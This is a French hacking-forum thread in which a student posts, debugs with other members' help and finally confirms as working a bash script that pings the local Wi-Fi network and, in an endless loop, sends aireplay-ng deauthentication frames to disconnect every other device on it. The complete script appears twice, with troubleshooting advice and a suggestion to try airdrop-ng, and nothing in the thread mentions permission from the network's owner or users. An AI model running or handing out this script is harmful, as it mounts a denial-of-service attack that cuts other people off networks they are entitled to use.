Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-06-2014 14:53:09

the_wild_roaster
Nouveau membre
Inscription : 09-06-2014
Messages : 8

Je cherche à faire un scrypt de déconnection des ordi sur wifi

Bonjour,

je suis étudiant en informatique, lorsque j'ai lu ce billet dans ce blog:

script baptisé Glasshole.sh capable de détecter la présence de Google Glass sur un réseau local (même si vous n'êtes pas admin de ce réseau) et de les bannir définitivement.

J'ai souhaité m'en inspirer et tenter de faire un scrypt qui déconnecte touts les ordinateurs du réseau wifi ou je suis connecté.

seulement voila j'ai cette erreur:

 IP ordi    = 192.168.0.11
 MAC reseau = 0A:A9:15:1A:DE:08
 grepLigne  = 192.168
 IP reseau  = 192.168.0.254

 ordi trouve :  192.168.0.30 a deco
 ping 1 packets transmitted, 1 received, 0% packet loss, time 0ms
 adresse MAC b8:27:eb:a2:32:4b
15:32:07  Waiting for beacon frame (BSSID: 0A:A9:15:1A:DE:08) on channel -1
15:32:07  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
 ordi trouve :  192.168.0.254 ne pas deco
 ordi trouve :  192.168.0.11 ne pas deco
 Scan termine 

voici mon scypt:

#!/bin/bash

rougeclair='\033[1;31m'
vertclair='\033[1;32m'
bleuclair='\033[1;34m'
neutre='\033[0;m'

NIC=$1 # peripherique reseau
BSSID=$(iwconfig $1 | grep 'Access Point: ' | grep -o '[0-9A-F]\{2\}\(:[0-9A-F]\{2\}\)\{5\}') # adresse MAC point acces wifi
IPordi=$(ifconfig $NIC | grep 'inet addr' | cut -d: -f2 | cut -d' ' -f1) #ip de l'ordi
grepLigne=$(echo $IPordi | cut -d. -f1).$(echo $IPordi | cut -d. -f2) #premier nombre pour trouver la bonne IP reseau
IPreseau=$(route | grep 'UG' | grep -E -o $grepLigne'.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)')

echo "$bleuclair\n IP ordi    =$neutre $IPordi"
echo "$bleuclair MAC reseau =$neutre $BSSID"
echo "$bleuclair grepLigne  =$neutre $grepLigne"                #affichage des parametre
echo "$bleuclair IP reseau  =$neutre $IPreseau\n"

airmon-ng stop mon0 > /dev/null # Pull down any lingering monitor devices 
airmon-ng start $NIC > /dev/null # Start a monitor device

while true;
do  
      for TARGET in $(nmap -sP "$IPreseau/24" | grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)') #lancement d'un scan ping et mise adresse dans TARGET
        do   
             echo -n $neutre 'ordi trouve : ' $TARGET                      #affichage de ladresse d'un ordi trouve
             if [ "$TARGET" = "$IPordi" -o "$TARGET" = "$IPreseau" ]       #test si c'est l'ordi courant ou le point acces wifi
             then
               echo $vertclair 'ne pas deco'
             else
               echo $rougeclair 'a deco'
               echo $neutre' ping '$(ping -q -c 1 $TARGET | grep 'packets transmitted') #ping pour avoir l'adresse MAC dans arp -an
               TARGET=$(arp -an | grep $TARGET | cut -d' ' -f4) #recuperation adresse mac dans TARGET
               echo " adresse MAC $TARGET"
               aireplay-ng -0 5 -a $BSSID -c $TARGET mon0 
             fi
        done
      echo $bleuclair 'Scan termine' $neutre
done

Si quelqu'un veut bien m'aider à comprendre ce que c'est voir m'aider à améliorer mon scrypt je l'en remercirait, bonne journée à vous.

Dernière modification par the_wild_roaster (09-06-2014 14:58:38)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-06-2014 16:41:37

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Je cherche à faire un scrypt de déconnection des ordi sur wifi

Bonjour et Bienvenue wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#3 09-06-2014 17:35:24

the_wild_roaster
Nouveau membre
Inscription : 09-06-2014
Messages : 8

Re : Je cherche à faire un scrypt de déconnection des ordi sur wifi

Merci à toi smile

J'ai essayé d'utiliser aireplay aujourd'hui avec l'adresse de mon ordinateur et de ma box, j'ai eu le meme problème.

Mon scrypt ne déconnecte pas l'ordinateur ou il est utilisé mais tout les autres (le portable par exemple dans ce cas).
Vu que j'utilise un scan par ping il tente aussi de deconnecter les appareils en ethernet (ce qui est un problème aussi).

Hors Ligne

#4 09-06-2014 18:09:11

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Je cherche à faire un scrypt de déconnection des ordi sur wifi

Bienvenue  à toi the_wild_roaster smile

Nous avons une section Présentation des membres; ce n'est en rien obligatoire mais c'est toujours plus sympa. wink

Dans ton terminal tu as ce message d'erreur :

15:32:07  Waiting for beacon frame (BSSID: 0A:A9:15:1A:DE:08) on channel -1
15:32:07  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

Quelle distribution utilises tu?
C'est toujours bien d'indiquer en début de post la distribution GNU Linux utilisée, la version d'aircrack-ng installée dans notre système d'exploitation  et le chipset wireless de notre adaptateur. wink

Le message d'erreur t'indique deux solutions  :

       1) pacher les drivers pour l'injection
       aircrack-ng doc. > Tutorial: How To Patch Drivers

       2) où bien ajouter dans ta ligne de commande aireplay-ng --ignore--negative-one
       

(sudo) aireplay-ng -0 X -a <mac_router> --ignore--negative-one

par rapport au code

NIC=$1

a priori ta première variable ne sert à rien, elle est vide, ou alors quelque chose m'échappe
Qu'est ce que tu voulais faire avec elle?
Ça à l'air de ne pas influer sur le code de toute façon

grepLigne=$(echo $IPordi | cut -d. -f1).$(echo $IPordi | cut -d. -f2)

Tu pourrais simplifier

grepLigne=$(echo $IPordi | cut -d. -f1,2)

PS: Je déplace ton sujet dans notre section dédiée aux scripts wink

Hors Ligne

#5 09-06-2014 19:10:41

the_wild_roaster
Nouveau membre
Inscription : 09-06-2014
Messages : 8

Re : Je cherche à faire un scrypt de déconnection des ordi sur wifi

merci pour l'acceuil smile

J'utilise ubuntu 14.04,  Aircrack-ng 1.1 et une clé USB Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter.

Désolé pour le bordel dans mon code et merci de m'avoir proposé la simplification. La variable "$NIC" ne sert à rien
elle pourrait etre remplacé partout par "$1" qui doit etre le nom de ton interface wifi.

Je vais tester tes différents conseils, j'espère que nous arriverons à un bon scrypt à la fin car la il a clairement pas mal de defauts.

***********************************************   EDIT   ***************************************

J'ai essayé l'option --ignore-negative-one et voici la sortie de mon scrypt

IP ordi    = 192.168.0.11
 MAC reseau = 0A:A9:15:1A:DE:08
 grepLigne  = 192.168
 IP reseau  = 192.168.0.254

 ordi trouve :  192.168.0.12 a deco
 ping 1 packets transmitted, 1 received, 0% packet loss, time 0ms
 adresse MAC 84:00:d2:ca:ff:57
21:21:54  Waiting for beacon frame (BSSID: 0A:A9:15:1A:DE:08) on channel -1
21:21:55  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:55  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:56  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:56  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:57  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
 ordi trouve :  192.168.0.30 a deco
 ping 1 packets transmitted, 1 received, 0% packet loss, time 0ms
 adresse MAC b8:27:eb:a2:32:4b
21:21:57  Waiting for beacon frame (BSSID: 0A:A9:15:1A:DE:08) on channel -1
21:21:57  Sending 64 directed DeAuth. STMAC: [B8:27:EB:A2:32:4B] [ 0| 0 ACKs]
21:21:58  Sending 64 directed DeAuth. STMAC: [B8:27:EB:A2:32:4B] [ 0| 0 ACKs]
21:21:58  Sending 64 directed DeAuth. STMAC: [B8:27:EB:A2:32:4B] [ 0| 0 ACKs]
21:21:59  Sending 64 directed DeAuth. STMAC: [B8:27:EB:A2:32:4B] [ 0| 0 ACKs]
21:21:59  Sending 64 directed DeAuth. STMAC: [B8:27:EB:A2:32:4B] [ 0| 0 ACKs]
 ordi trouve :  192.168.0.254 ne pas deco
 ordi trouve :  192.168.0.11 ne pas deco
 Scan termine 

J'en déduis que je dois patcher mon driver, j'ai lu le tuto mais je n'arrive meme pas à compiler le driver d'origine fourni avec ma clé (elle était reconnue nativement) car leur scrypt plante..

Dernière modification par the_wild_roaster (09-06-2014 20:26:49)

Hors Ligne

#6 10-06-2014 00:46:51

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Je cherche à faire un scrypt de déconnection des ordi sur wifi

Installe toi la dernière version d'aircrak-ng; celle qui est disponible depuis les dépôts apt-get d'ubuntu est déphasée
aircrack-ng-1.2-beta3 - notre suite favorite s'affine


adresse MAC 84:00:d2:ca:ff:57
21:21:54  Waiting for beacon frame (BSSID: 0A:A9:15:1A:DE:08) on channel -1
21:21:55  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:55  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:56  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:56  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]
21:21:57  Sending 64 directed DeAuth. STMAC: [84:00:D2:CA:FF:57] [ 0| 0 ACKs]

tu trouves bien l'objectif mais n'injecte pas d'ACK

Il faudrait que tu regardes ce qui se passe précisément lors de tes attaques DoS

C'est à dire lancer une console avec airodump-ng avec filtre bssid et canal et dans une autre console essayer des attaques de désauthetifications.

Ton chipset m'inquiète un peu... je m'explique:  je crois qu'il n'est pas très bien supporté.
Un des problème qu'il pourrait avoir c'est d'être inefficace en attaque aireplay-ng en spécifiant le client.
Ce n'est pas très génant pour chopper un handshake mais dans le cas de ton script ça l'est plutôt vu que tu veux désauthentifier des clients spécifiques...

Il te faut donc éclairer ce point avant tout de chose, faire des test de dés-authentification avec la nouvelle version d'aitrcrack-ng, parce que ton code n'a pas l'air mauvais du tout...

J'en déduis que je dois patcher mon driver, j'ai lu le tuto mais je n'arrive meme pas à compiler le driver d'origine fourni avec ma clé (elle était reconnue nativement) car leur scrypt plante..

il y a pas mal de chance que tu n'aies pas besoin de patcher les drivers en installant la dernière version.

Hors Ligne

#7 16-06-2014 13:35:44

the_wild_roaster
Nouveau membre
Inscription : 09-06-2014
Messages : 8

Re : Je cherche à faire un scrypt de déconnection des ordi sur wifi

Voila j'ai réussis à résoudre mes problème et je peux maintenant attester que mon scrypt fonctionne, le voici:

#!/bin/bash

rougeclair='\033[1;31m'
vertclair='\033[1;32m'
bleuclair='\033[1;34m'
neutre='\033[0;m'

NIC=$1 # peripherique reseau
BSSID=$(iwconfig $1 | grep 'Access Point: ' | grep -o '[0-9A-F]\{2\}\(:[0-9A-F]\{2\}\)\{5\}') # adresse MAC point acces wifi
IPordi=$(ifconfig $NIC | grep 'inet addr' | cut -d: -f2 | cut -d' ' -f1) #ip de l'ordi
grepLigne=$(echo $IPordi | cut -d. -f1,2) #premier nombre pour trouver la bonne IP reseau
IPreseau=$(route -n | grep 'UG' | grep -E -o $grepLigne'.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)')

echo "$bleuclair\n IP ordi    =$neutre $IPordi"
echo "$bleuclair MAC reseau =$neutre $BSSID"
echo "$bleuclair grepLigne  =$neutre $grepLigne"                #affichage des parametre
echo "$bleuclair IP reseau  =$neutre $IPreseau\n"

airmon-ng stop mon0 > /dev/null # Pull down any lingering monitor devices 
airmon-ng start $NIC > /dev/null # Start a monitor device

while true;
do  
      for TARGET in $(nmap -sP "$IPreseau/24" | grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)') #lancement d'un scan ping et mise adresse dans TARGET
        do   
             echo -n $neutre 'ordi trouve : ' $TARGET                      #affichage de ladresse d'un ordi trouve
             if [ "$TARGET" = "$IPordi" -o "$TARGET" = "$IPreseau" ]       #test si c'est l'ordi courant ou le point acces wifi
             then
               echo $vertclair 'ne pas deco'
             else
               echo $rougeclair 'a deco'
               echo $neutre' ping '$(ping -q -c 1 $TARGET | grep 'packets transmitted') #ping pour avoir l'adresse MAC dans arp -an
               TARGET=$(arp -an | grep $TARGET | cut -d' ' -f4) #recuperation adresse mac dans TARGET
               echo " adresse MAC $TARGET"
               echo ' resultat envoi des packets '$rougeclair
               aireplay-ng -0 1 -a $BSSID -c $TARGET --ignore-negative-one  mon0
             fi
        done
      echo $bleuclair 'Scan termine' $neutre
done

Si quelqu'un a une idée de feature à ajouter ou d'amélioration smile

Hors Ligne

#8 16-06-2014 19:18:28

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Je cherche à faire un scrypt de déconnection des ordi sur wifi

As-tu essayé airdrop-ng aussi pour la déco ? wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Quelle carte wifi choisir ? par Morpheus_Dotcom
2 110 05-12-2016 15:11:00 par Morpheus_Dotcom
2 149 30-11-2016 19:45:54 par flatounet
5 160 22-11-2016 18:48:09 par koala
8 303 17-11-2016 12:02:17 par koala
0 286 22-10-2016 19:03:48 par Antho3674

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]